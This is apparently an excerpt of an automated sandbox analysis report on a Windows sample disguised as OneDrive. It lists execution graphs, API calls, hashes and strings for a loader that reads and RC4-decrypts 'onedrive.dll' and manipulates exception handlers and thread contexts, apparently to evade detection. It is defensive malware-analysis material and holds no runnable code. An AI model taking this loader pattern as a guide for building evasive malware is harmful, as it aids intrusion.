                                                    • API String ID:
                                                    • Opcode ID: 5c3f02a2b8ef5a32bb499d2493809e7f94ee755a4930b238c931263fea084cba
                                                    • Instruction ID: 139cd0774f97c2f33ec2a770fe0ef59e07d27c28a3e1234edd9204724efe6364
                                                    • Opcode Fuzzy Hash: 5c3f02a2b8ef5a32bb499d2493809e7f94ee755a4930b238c931263fea084cba
                                                    • Instruction Fuzzy Hash: C5E0E511A1EA9A0FDB28A36D4830294AA91EF49640F1840FFC089C71E7D99418098351

                                                    Execution Graph

                                                    Execution Coverage:1.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:47.3%
                                                    Total number of Nodes:186
                                                    Total number of Limit Nodes:8
                                                    execution_graph 28227 7ffdf3ad2039 28230 7ffdf3ad2120 28227->28230 28229 7ffdf3ad203e 28231 7ffdf3ad214a 28230->28231 28233 7ffdf3ad2137 28230->28233 28234 7ffdf3ad2060 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 28231->28234 28233->28229 28234->28233 28235 7ff63ea1e530 GetStartupInfoW 28236 7ff63ea1e56f 28235->28236 28237 7ff63ea1e581 28236->28237 28238 7ff63ea1e58a Sleep 28236->28238 28239 7ff63ea1e5a6 _amsg_exit 28237->28239 28240 7ff63ea1e5b4 28237->28240 28238->28236 28239->28240 28241 7ff63ea1e62a _initterm 28240->28241 28242 7ff63ea1e60b 28240->28242 28243 7ff63ea1e647 _IsNonwritableInCurrentImage 28240->28243 28241->28243 28243->28242 28249 7ff63ea11384 28243->28249 28246 7ff63ea1e708 exit 28247 7ff63ea1e710 28246->28247 28247->28242 28248 7ff63ea1e719 _cexit 28247->28248 28248->28242 28250 7ff63ea113c3 28249->28250 28308 7ff63ea19cac 28250->28308 28253 7ff63ea19cac EventRegister 28254 7ff63ea113f7 EventRegister 28253->28254 28255 7ff63ea11446 EventSetInformation 28254->28255 28256 7ff63ea11467 28254->28256 28255->28256 28257 7ff63ea114c8 28256->28257 28258 7ff63ea1149a EventActivityIdControl 28256->28258 28259 7ff63ea11552 SLOpen 28257->28259 28311 7ff63ea11008 EventWriteTransfer 28257->28311 28258->28257 28260 7ff63ea11577 SLpIsCurrentInstalledProductKeyDefaultKey 28259->28260 28266 7ff63ea11568 28259->28266 28261 7ff63ea11591 28260->28261 28260->28266 28262 7ff63ea1159c RoInitialize 28261->28262 28261->28266 28263 7ff63ea115b0 28262->28263 28262->28266 28264 7ff63ea115c9 CommandLineToArgvW 28263->28264 28283 7ff63ea115b5 28263->28283 28268 7ff63ea115e4 GetLastError 28264->28268 28269 7ff63ea11615 28264->28269 28265 7ff63ea11746 EventUnregister 28317 7ff63ea11c50 7 API calls 28265->28317 28266->28265 28316 7ff63ea11008 EventWriteTransfer 28266->28316 28268->28283 28312 7ff63ea118a4 9 API calls 28269->28312 28271 7ff63ea1176e 28275 7ff63ea11787 28271->28275 28276 7ff63ea11777 SLClose 28271->28276 28273 7ff63ea116e3 RoUninitialize 28273->28266 28318 7ff63ea19b6c EventUnregister 28275->28318 28276->28275 28277 7ff63ea11624 28279 7ff63ea1162e ChangeWindowMessageFilter 28277->28279 28277->28283 28279->28268 28280 7ff63ea11646 28279->28280 28313 7ff63ea17b1c 305 API calls 28280->28313 28281 7ff63ea11793 28319 7ff63ea19b6c EventUnregister 28281->28319 28283->28273 28285 7ff63ea11659 28285->28283 28286 7ff63ea116bd GetMessageW 28287 7ff63ea116d9 28286->28287 28290 7ff63ea11653 28286->28290 28315 7ff63ea11c50 7 API calls 28287->28315 28288 7ff63ea1179f 28293 7ff63ea117ef 28288->28293 28294 7ff63ea117df CloseHandle 28288->28294 28289 7ff63ea1169d TranslateMessage DispatchMessageW 28289->28286 28290->28285 28290->28286 28290->28289 28314 7ff63ea17f30 23 API calls 28290->28314 28292 7ff63ea116e0 28292->28273 28295 7ff63ea117fc UnregisterWaitEx 28293->28295 28296 7ff63ea1180f 28293->28296 28294->28293 28295->28296 28298 7ff63ea11818 UnregisterWaitEx 28296->28298 28299 7ff63ea1182b 28296->28299 28298->28299 28300 7ff63ea11844 28299->28300 28301 7ff63ea11834 CloseHandle 28299->28301 28302 7ff63ea1185d 28300->28302 28303 7ff63ea1184d CloseHandle 28300->28303 28301->28300 28304 7ff63ea11871 28302->28304 28305 7ff63ea11862 LocalFree 28302->28305 28303->28302 28320 7ff63ea1e7d0 7 API calls __raise_securityfailure 28304->28320 28305->28304 28307 7ff63ea1187f 28307->28246 28307->28247 28309 7ff63ea19cb7 EventRegister 28308->28309 28310 7ff63ea113dd 28308->28310 28309->28310 28310->28253 28311->28259 28312->28277 28313->28290 28314->28290 28315->28292 28316->28265 28317->28271 28318->28281 28319->28288 28320->28307 28321 7ffdf3ad1010 CreateFileA 28322 7ffdf3ad105e GetFileSize 28321->28322 28325 7ffdf3ad13b3 28321->28325 28323 7ffdf3ad1084 VirtualAlloc 28322->28323 28324 7ffdf3ad13ee CloseHandle 28322->28324 28323->28324 28326 7ffdf3ad10a6 ReadFile 28323->28326 28324->28325 28327 7ffdf3ad10c6 28326->28327 28328 7ffdf3ad13dd VirtualFree 28326->28328 28327->28328 28329 7ffdf3ad10cf CloseHandle LoadLibraryW GetProcAddress 28327->28329 28328->28324 28330 7ffdf3ad1116 28329->28330 28331 7ffdf3ad1100 VirtualFree 28329->28331 28356 7ffdf3ad1590 28330->28356 28331->28325 28333 7ffdf3ad119d 28333->28325 28334 7ffdf3ad11a5 GetModuleHandleW GetProcAddress 28333->28334 28334->28325 28335 7ffdf3ad11da 28334->28335 28359 7ffdf3ad1860 28335->28359 28338 7ffdf3ad1208 NtQuerySecurityObject 28339 7ffdf3ad124d GetModuleHandleW GetProcAddress 28338->28339 28352 7ffdf3ad1243 28338->28352 28339->28325 28340 7ffdf3ad1276 28339->28340 28342 7ffdf3ad1860 7 API calls 28340->28342 28343 7ffdf3ad12a0 28342->28343 28343->28325 28344 7ffdf3ad12a8 NtQuerySecurityObject 28343->28344 28345 7ffdf3ad12e9 GetModuleHandleW GetProcAddress 28344->28345 28344->28352 28345->28325 28347 7ffdf3ad133f 28345->28347 28348 7ffdf3ad1860 7 API calls 28347->28348 28349 7ffdf3ad1364 28348->28349 28349->28325 28350 7ffdf3ad1368 NtQuerySecurityObject 28349->28350 28351 7ffdf3ad13ba SleepEx 28350->28351 28350->28352 28365 7ffdf3ad1550 DeleteCriticalSection 28351->28365 28368 7ffdf3ad1430 62 API calls _vswprintf_s_l 28352->28368 28355 7ffdf3ad13d0 SleepEx 28355->28355 28357 7ffdf3ad15d3 28356->28357 28358 7ffdf3ad159e InitializeCriticalSection AddVectoredExceptionHandler 28356->28358 28357->28333 28358->28333 28360 7ffdf3ad1887 28359->28360 28364 7ffdf3ad1200 28359->28364 28360->28364 28369 7ffdf3ad17e0 EnterCriticalSection LeaveCriticalSection 28360->28369 28362 7ffdf3ad192f GetCurrentThreadId 28363 7ffdf3ad15e0 OpenThread GetThreadContext SetThreadContext CloseHandle 28362->28363 28363->28364 28364->28325 28364->28338 28366 7ffdf3ad13ca 28365->28366 28367 7ffdf3ad156d RemoveVectoredExceptionHandler 28365->28367 28366->28325 28366->28355 28367->28366 28368->28325 28370 7ffdf3ad25b0 28371 7ffdf3ad25bf 28370->28371 28380 7ffdf3ad2b00 28371->28380 28378 7ffdf3ad25d8 28381 7ffdf3ad2b80 28380->28381 28396 7ffdf3ad3170 28381->28396 28383 7ffdf3ad25cb 28384 7ffdf3ad3b00 28383->28384 28385 7ffdf3ad3b09 28384->28385 28407 7ffdf3ad4430 28385->28407 28388 7ffdf3ad25d1 28388->28378 28392 7ffdf3aea0a0 28388->28392 28390 7ffdf3ad3b1f 28390->28388 28414 7ffdf3ad44a0 DeleteCriticalSection 28390->28414 28417 7ffdf3afa950 28392->28417 28395 7ffdf3ad3b70 7 API calls 2 library calls 28395->28378 28397 7ffdf3ad3179 28396->28397 28398 7ffdf3ad3184 28397->28398 28399 7ffdf3ad31d0 IsProcessorFeaturePresent 28397->28399 28398->28383 28400 7ffdf3ad31e8 28399->28400 28405 7ffdf3ad3410 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 28400->28405 28402 7ffdf3ad31fb 28406 7ffdf3ad3190 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28402->28406 28404 7ffdf3ad329d 28404->28383 28405->28402 28406->28404 28410 7ffdf3ad443e 28407->28410 28408 7ffdf3ad3b0f 28408->28388 28413 7ffdf3ad43b0 8 API calls 2 library calls 28408->28413 28410->28408 28411 7ffdf3ad4478 28410->28411 28415 7ffdf3ad5640 6 API calls __vcrt_initialize_locks 28410->28415 28416 7ffdf3ad44a0 DeleteCriticalSection 28411->28416 28413->28390 28414->28388 28415->28410 28416->28408 28418 7ffdf3afa971 28417->28418 28419 7ffdf3ad25e1 28417->28419 28418->28419 28421 7ffdf3af1190 28418->28421 28419->28378 28419->28395 28432 7ffdf3af6620 EnterCriticalSection 28421->28432 28423 7ffdf3af119e 28433 7ffdf3b00510 28423->28433 28425 7ffdf3af11aa 28426 7ffdf3af11ae 28425->28426 28441 7ffdf3af0e40 11 API calls 28425->28441 28443 7ffdf3af66b0 LeaveCriticalSection 28426->28443 28429 7ffdf3af11b5 28442 7ffdf3af0ff0 GetStdHandle GetFileType 28429->28442 28430 7ffdf3af11c9 28430->28418 28432->28423 28434 7ffdf3b00522 28433->28434 28438 7ffdf3b00584 28434->28438 28444 7ffdf3af6620 EnterCriticalSection 28434->28444 28436 7ffdf3b00636 28450 7ffdf3af66b0 LeaveCriticalSection 28436->28450 28438->28425 28440 7ffdf3b005d4 28440->28436 28445 7ffdf3b002d0 28440->28445 28441->28429 28442->28426 28443->28430 28444->28440 28451 7ffdf3aece10 28445->28451 28447 7ffdf3b002f8 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method 28448 7ffdf3b00316 __crt_unique_heap_ptr type_info::_name_internal_method 28447->28448 28455 7ffdf3aefda0 6 API calls 28447->28455 28448->28440 28450->28438 28452 7ffdf3aece30 28451->28452 28454 7ffdf3aece45 memcpy_s 28452->28454 28456 7ffdf3aeb500 28452->28456 28454->28447 28455->28448 28460 7ffdf3aeb51c _get_purecall_handler 28456->28460 28458 7ffdf3aeb55a 28458->28454 28460->28458 28461 7ffdf3aeb5a0 28460->28461 28468 7ffdf3afab00 EnterCriticalSection LeaveCriticalSection new[] 28460->28468 28469 7ffdf3af6620 EnterCriticalSection 28461->28469 28463 7ffdf3aeb5ca new[] 28464 7ffdf3aeb785 HeapAlloc 28463->28464 28467 7ffdf3aeb664 _CrtDumpMemoryLeaks memcpy_s 28463->28467 28464->28467 28466 7ffdf3aeb9e3 28466->28460 28470 7ffdf3af66b0 LeaveCriticalSection 28467->28470 28468->28460 28469->28463 28470->28466

                                                    Executed Functions

                                                    Function 00007FFDF3AD1010 Relevance: 63.2, APIs: 21, Strings: 15, Instructions: 226libraryfileloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffdf3ad1010-7ffdf3ad1058 CreateFileA 1 7ffdf3ad1407-7ffdf3ad1412 0->1 2 7ffdf3ad105e-7ffdf3ad107e GetFileSize 0->2 3 7ffdf3ad1084-7ffdf3ad10a0 VirtualAlloc 2->3 4 7ffdf3ad13ee-7ffdf3ad13f1 CloseHandle 2->4 3->4 6 7ffdf3ad10a6-7ffdf3ad10c0 ReadFile 3->6 5 7ffdf3ad13f7-7ffdf3ad13ff 4->5 5->1 7 7ffdf3ad10c6-7ffdf3ad10c9 6->7 8 7ffdf3ad13dd-7ffdf3ad13e8 VirtualFree 6->8 7->8 9 7ffdf3ad10cf-7ffdf3ad10fe CloseHandle LoadLibraryW GetProcAddress 7->9 8->4 10 7ffdf3ad1116-7ffdf3ad119f call 7ffdf3ad1590 9->10 11 7ffdf3ad1100-7ffdf3ad1111 VirtualFree 9->11 15 7ffdf3ad11a5-7ffdf3ad11d4 GetModuleHandleW GetProcAddress 10->15 16 7ffdf3ad13b3-7ffdf3ad13b8 10->16 11->5 15->16 17 7ffdf3ad11da-7ffdf3ad1202 call 7ffdf3ad1860 15->17 16->5 17->16 20 7ffdf3ad1208-7ffdf3ad1241 NtQuerySecurityObject 17->20 21 7ffdf3ad1243-7ffdf3ad1248 20->21 22 7ffdf3ad124d-7ffdf3ad1270 GetModuleHandleW GetProcAddress 20->22 23 7ffdf3ad13a4-7ffdf3ad13ae call 7ffdf3ad1430 21->23 22->16 24 7ffdf3ad1276-7ffdf3ad12a2 call 7ffdf3ad1860 22->24 23->16 24->16 28 7ffdf3ad12a8-7ffdf3ad12dd NtQuerySecurityObject 24->28 29 7ffdf3ad12e9-7ffdf3ad12f7 28->29 30 7ffdf3ad12df-7ffdf3ad12e4 28->30 31 7ffdf3ad12f9 29->31 32 7ffdf3ad131a-7ffdf3ad133d GetModuleHandleW GetProcAddress 29->32 30->23 33 7ffdf3ad1300-7ffdf3ad1318 31->33 32->16 34 7ffdf3ad133f-7ffdf3ad1366 call 7ffdf3ad1860 32->34 33->32 33->33 34->16 37 7ffdf3ad1368-7ffdf3ad139d NtQuerySecurityObject 34->37 38 7ffdf3ad13ba-7ffdf3ad13cc SleepEx call 7ffdf3ad1550 37->38 39 7ffdf3ad139f 37->39 38->16 42 7ffdf3ad13ce 38->42 39->23 43 7ffdf3ad13d0-7ffdf3ad13db SleepEx 42->43 43->43
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FileHandleVirtual$AddressCloseFreeProc$AllocCreateLibraryLoadModuleObjectQueryReadSecuritySize
                                                    • String ID: @$NTDLL.DLL$NtQuerySecurityObject$SystemFunction033$[!] 0x%0.8X Failed With Error: 0x%0.8X $advapi32.dll$ahrm$jnui$onedrive.dll$oyty$sztw$vhps$vnzj$xcha$zhww
                                                    • API String ID: 871153514-2486118554
                                                    • Opcode ID: 4e14f8f56a3283c630120228ac60a118077f7e1122e4534a4c78e4a8852a491e
                                                    • Instruction ID: c1871be85fef37e880d94bc402360dc31ec7bb043c163e24324f58a5ed7ff57e
                                                    • Opcode Fuzzy Hash: 4e14f8f56a3283c630120228ac60a118077f7e1122e4534a4c78e4a8852a491e
                                                    • Instruction Fuzzy Hash: 09B18C31B09B8295E7A1DF26E864B6936A4FB45794F410339E9AD2ABE8DF3CD105C700
                                                    Function 00007FF63EA11384 Relevance: 31.8, APIs: 21, Instructions: 308windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 44 7ff63ea11384-7ff63ea11444 call 7ff63ea1ef91 call 7ff63ea19cac * 2 EventRegister 51 7ff63ea11446-7ff63ea11462 EventSetInformation 44->51 52 7ff63ea11467-7ff63ea11488 44->52 51->52 53 7ff63ea114c8-7ff63ea114cb 52->53 54 7ff63ea1148a-7ff63ea1148d 52->54 56 7ff63ea114d2-7ff63ea114df 53->56 54->53 55 7ff63ea1148f-7ff63ea11498 54->55 55->53 57 7ff63ea1149a-7ff63ea114c6 EventActivityIdControl 55->57 58 7ff63ea114e1-7ff63ea114e4 56->58 59 7ff63ea11552-7ff63ea11566 SLOpen 56->59 57->56 58->59 62 7ff63ea114e6-7ff63ea114ef 58->62 60 7ff63ea11577-7ff63ea1158f SLpIsCurrentInstalledProductKeyDefaultKey 59->60 61 7ff63ea11568-7ff63ea1156a call 7ff63ea11d10 59->61 60->61 64 7ff63ea11591-7ff63ea11595 60->64 68 7ff63ea1156f-7ff63ea11572 61->68 62->59 65 7ff63ea114f1-7ff63ea114f8 62->65 69 7ff63ea11597-7ff63ea1159a 64->69 70 7ff63ea1159c-7ff63ea115ae RoInitialize 64->70 66 7ff63ea11527 65->66 67 7ff63ea114fa-7ff63ea11501 65->67 74 7ff63ea1152a-7ff63ea1154d call 7ff63ea11008 66->74 72 7ff63ea1151e-7ff63ea11525 67->72 73 7ff63ea11503-7ff63ea1150a 67->73 75 7ff63ea116ef-7ff63ea116fd 68->75 69->68 70->61 71 7ff63ea115b0-7ff63ea115b3 70->71 76 7ff63ea115c9-7ff63ea115e2 CommandLineToArgvW 71->76 77 7ff63ea115b5-7ff63ea115c4 call 7ff63ea11d10 71->77 72->74 73->72 78 7ff63ea1150c-7ff63ea11513 73->78 74->59 79 7ff63ea11746-7ff63ea11775 EventUnregister call 7ff63ea11c50 75->79 80 7ff63ea116ff-7ff63ea11706 75->80 85 7ff63ea115e4-7ff63ea115f2 GetLastError 76->85 86 7ff63ea11615-7ff63ea11628 call 7ff63ea118a4 76->86 94 7ff63ea116e3-7ff63ea116ea RoUninitialize 77->94 78->72 83 7ff63ea11515-7ff63ea1151c 78->83 97 7ff63ea11787-7ff63ea117aa call 7ff63ea19b6c * 2 79->97 98 7ff63ea11777-7ff63ea11783 SLClose 79->98 80->79 84 7ff63ea11708-7ff63ea11719 80->84 83->66 83->72 84->79 89 7ff63ea1171b-7ff63ea11741 call 7ff63ea11008 84->89 90 7ff63ea115fb-7ff63ea11606 85->90 91 7ff63ea115f4-7ff63ea115f9 85->91 102 7ff63ea1162a-7ff63ea1162c 86->102 103 7ff63ea1162e-7ff63ea11644 ChangeWindowMessageFilter 86->103 89->79 96 7ff63ea11609 90->96 91->96 94->75 100 7ff63ea1160b-7ff63ea11610 call 7ff63ea11d10 96->100 112 7ff63ea117b0-7ff63ea117b6 97->112 98->97 100->94 102->100 103->85 104 7ff63ea11646-7ff63ea11657 call 7ff63ea17b1c 103->104 113 7ff63ea11659 104->113 114 7ff63ea116bd-7ff63ea116d7 GetMessageW 104->114 115 7ff63ea117b8-7ff63ea117c9 112->115 116 7ff63ea117cc-7ff63ea117d4 112->116 113->102 117 7ff63ea116d9-7ff63ea116e0 call 7ff63ea11c50 114->117 118 7ff63ea1165b-7ff63ea11662 114->118 115->116 116->112 119 7ff63ea117d6-7ff63ea117dd 116->119 117->94 120 7ff63ea1169d-7ff63ea116b8 TranslateMessage DispatchMessageW 118->120 121 7ff63ea11664-7ff63ea11671 118->121 125 7ff63ea117ef-7ff63ea117fa 119->125 126 7ff63ea117df-7ff63ea117eb CloseHandle 119->126 120->114 127 7ff63ea11689-7ff63ea11693 121->127 128 7ff63ea11673-7ff63ea11686 call 7ff63ea17f30 121->128 129 7ff63ea117fc-7ff63ea1180b UnregisterWaitEx 125->129 130 7ff63ea1180f-7ff63ea11816 125->130 126->125 127->120 128->127 129->130 133 7ff63ea11818-7ff63ea11827 UnregisterWaitEx 130->133 134 7ff63ea1182b-7ff63ea11832 130->134 133->134 135 7ff63ea11844-7ff63ea1184b 134->135 136 7ff63ea11834-7ff63ea11840 CloseHandle 134->136 137 7ff63ea1185d-7ff63ea11860 135->137 138 7ff63ea1184d-7ff63ea11859 CloseHandle 135->138 136->135 139 7ff63ea11871-7ff63ea1189b call 7ff63ea1e7d0 137->139 140 7ff63ea11862-7ff63ea1186c LocalFree 137->140 138->137 140->139
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Event$CloseMessage$HandleUnregister$RegisterWait$ActivityArgvChangeCommandControlCurrentDefaultDispatchErrorFilterFreeInformationInitializeInstalledLastLineLocalOpenProductTranslateUninitializeWindow
                                                    • String ID:
                                                    • API String ID: 4262568299-0
                                                    • Opcode ID: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                                    • Instruction ID: 27b6223d7796cfc9e077c54830d5dc22fea63372fb7b556c7cf169b82af85ef9
                                                    • Opcode Fuzzy Hash: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                                    • Instruction Fuzzy Hash: 26E14E31A09A46C6EB108BA2E8402B877A1FFB5B94F458531E90EA7754DF3CE44DE760
                                                    Function 00007FFDF3AEB5A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 228memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 143 7ffdf3aeb5a0-7ffdf3aeb5e1 call 7ffdf3af6620 call 7ffdf3aec600 148 7ffdf3aeb5e3-7ffdf3aeb5ed 143->148 149 7ffdf3aeb5f0-7ffdf3aeb5f8 143->149 148->149 150 7ffdf3aeb5ef 148->150 151 7ffdf3aeb6e0-7ffdf3aeb6ef 149->151 152 7ffdf3aeb5fe-7ffdf3aeb662 149->152 150->149 153 7ffdf3aeb705 151->153 154 7ffdf3aeb6f1-7ffdf3aeb6fc 151->154 152->151 158 7ffdf3aeb664-7ffdf3aeb66d 152->158 156 7ffdf3aeb70a-7ffdf3aeb71c 153->156 154->153 157 7ffdf3aeb6fe-7ffdf3aeb703 154->157 159 7ffdf3aeb740-7ffdf3aeb751 call 7ffdf3aebb40 156->159 160 7ffdf3aeb71e-7ffdf3aeb72e call 7ffdf3aef4b0 156->160 157->156 161 7ffdf3aeb6ac-7ffdf3aeb6d6 call 7ffdf3aeef40 158->161 162 7ffdf3aeb66f-7ffdf3aeb6a5 call 7ffdf3aeef40 158->162 173 7ffdf3aeb785-7ffdf3aeb7bb HeapAlloc 159->173 174 7ffdf3aeb753-7ffdf3aeb780 call 7ffdf3aeef40 159->174 170 7ffdf3aeb73b 160->170 171 7ffdf3aeb730-7ffdf3aeb735 160->171 178 7ffdf3aeb6db 161->178 179 7ffdf3aeb6d8-7ffdf3aeb6d9 161->179 175 7ffdf3aeb6aa 162->175 176 7ffdf3aeb6a7-7ffdf3aeb6a8 162->176 177 7ffdf3aeb9dc-7ffdf3aeb9ef call 7ffdf3af66b0 170->177 171->170 181 7ffdf3aeb7df-7ffdf3aeb7f4 173->181 182 7ffdf3aeb7bd-7ffdf3aeb7cd call 7ffdf3aef4b0 173->182 174->173 192 7ffdf3aeb782-7ffdf3aeb783 174->192 175->178 176->175 178->177 179->178 184 7ffdf3aeb856-7ffdf3aeb86c 181->184 185 7ffdf3aeb7f6-7ffdf3aeb851 181->185 195 7ffdf3aeb7da 182->195 196 7ffdf3aeb7cf-7ffdf3aeb7d4 182->196 190 7ffdf3aeb88c 184->190 191 7ffdf3aeb86e-7ffdf3aeb88a 184->191 189 7ffdf3aeb96d-7ffdf3aeb9d7 call 7ffdf3b10200 call 7ffdf3aea300 call 7ffdf3b10200 call 7ffdf3aea300 call 7ffdf3b10200 call 7ffdf3aea300 185->189 189->177 197 7ffdf3aeb897-7ffdf3aeb8c1 190->197 191->197 192->173 195->177 196->195 199 7ffdf3aeb8c3-7ffdf3aeb8ca 197->199 200 7ffdf3aeb8d1-7ffdf3aeb8d9 197->200 199->200 202 7ffdf3aeb8db-7ffdf3aeb8eb 200->202 203 7ffdf3aeb8ed-7ffdf3aeb8f2 200->203 205 7ffdf3aeb8f9-7ffdf3aeb966 202->205 203->205 205->189
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$AllocCriticalEnterHeapSection
                                                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.
                                                    • API String ID: 3996555514-2973468218
                                                    • Opcode ID: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                                    • Instruction ID: b8ca3ec5aa35c9260125c11946cc0104ee50f363ede606c1bb1690c403a32491
                                                    • Opcode Fuzzy Hash: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                                    • Instruction Fuzzy Hash: 9DC1FD35B0CB8585E720DB16E4A4B6A77A0EB85790F524235DEAD5BBE8DF3CD480CB00
                                                    Function 000001729DD20020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtual$AllocateProtect
                                                    • String ID:
                                                    • API String ID: 2931642484-0
                                                    • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                    • Instruction ID: c03f44f47d12fd9784de716a30afe91e5208e4bec6ea89bef0aee9ddd99ced8b
                                                    • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                    • Instruction Fuzzy Hash: 8F71293161CA484FE75C9F18D8427BA77E1FB84314F54561EFA8BC3292DA34D88386C2
                                                    Function 00007FF63EA1E530 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 214 7ff63ea1e530-7ff63ea1e56c GetStartupInfoW 215 7ff63ea1e56f-7ff63ea1e57a 214->215 216 7ff63ea1e597 215->216 217 7ff63ea1e57c-7ff63ea1e57f 215->217 220 7ff63ea1e59c-7ff63ea1e5a4 216->220 218 7ff63ea1e58a-7ff63ea1e595 Sleep 217->218 219 7ff63ea1e581-7ff63ea1e588 217->219 218->215 219->220 221 7ff63ea1e5a6-7ff63ea1e5b2 _amsg_exit 220->221 222 7ff63ea1e5b4-7ff63ea1e5bc 220->222 223 7ff63ea1e620-7ff63ea1e628 221->223 224 7ff63ea1e5be-7ff63ea1e5da 222->224 225 7ff63ea1e615 222->225 227 7ff63ea1e647-7ff63ea1e649 223->227 228 7ff63ea1e62a-7ff63ea1e63d _initterm 223->228 229 7ff63ea1e5de-7ff63ea1e5e1 224->229 226 7ff63ea1e61b 225->226 226->223 230 7ff63ea1e64b-7ff63ea1e64e 227->230 231 7ff63ea1e655-7ff63ea1e65c 227->231 228->227 232 7ff63ea1e607-7ff63ea1e609 229->232 233 7ff63ea1e5e3-7ff63ea1e5e5 229->233 230->231 235 7ff63ea1e688-7ff63ea1e695 231->235 236 7ff63ea1e65e-7ff63ea1e66c call 7ff63ea1ed10 231->236 232->226 234 7ff63ea1e60b-7ff63ea1e610 232->234 233->234 237 7ff63ea1e5e7-7ff63ea1e5ea 233->237 238 7ff63ea1e776-7ff63ea1e793 234->238 242 7ff63ea1e697-7ff63ea1e69c 235->242 243 7ff63ea1e6a1-7ff63ea1e6a6 235->243 236->235 248 7ff63ea1e66e-7ff63ea1e67e 236->248 240 7ff63ea1e5fc-7ff63ea1e605 237->240 241 7ff63ea1e5ec-7ff63ea1e5f8 237->241 240->229 241->240 242->238 244 7ff63ea1e6aa-7ff63ea1e6b1 243->244 246 7ff63ea1e727-7ff63ea1e72b 244->246 247 7ff63ea1e6b3-7ff63ea1e6b6 244->247 252 7ff63ea1e73b-7ff63ea1e744 246->252 253 7ff63ea1e72d-7ff63ea1e737 246->253 250 7ff63ea1e6b8-7ff63ea1e6ba 247->250 251 7ff63ea1e6bc-7ff63ea1e6c2 247->251 248->235 250->246 250->251 254 7ff63ea1e6d2-7ff63ea1e6f4 call 7ff63ea11384 251->254 255 7ff63ea1e6c4-7ff63ea1e6d0 251->255 252->238 252->244 253->252 257 7ff63ea1e6f9-7ff63ea1e706 254->257 255->251 258 7ff63ea1e708-7ff63ea1e70a exit 257->258 259 7ff63ea1e710-7ff63ea1e717 257->259 258->259 260 7ff63ea1e719-7ff63ea1e71f _cexit 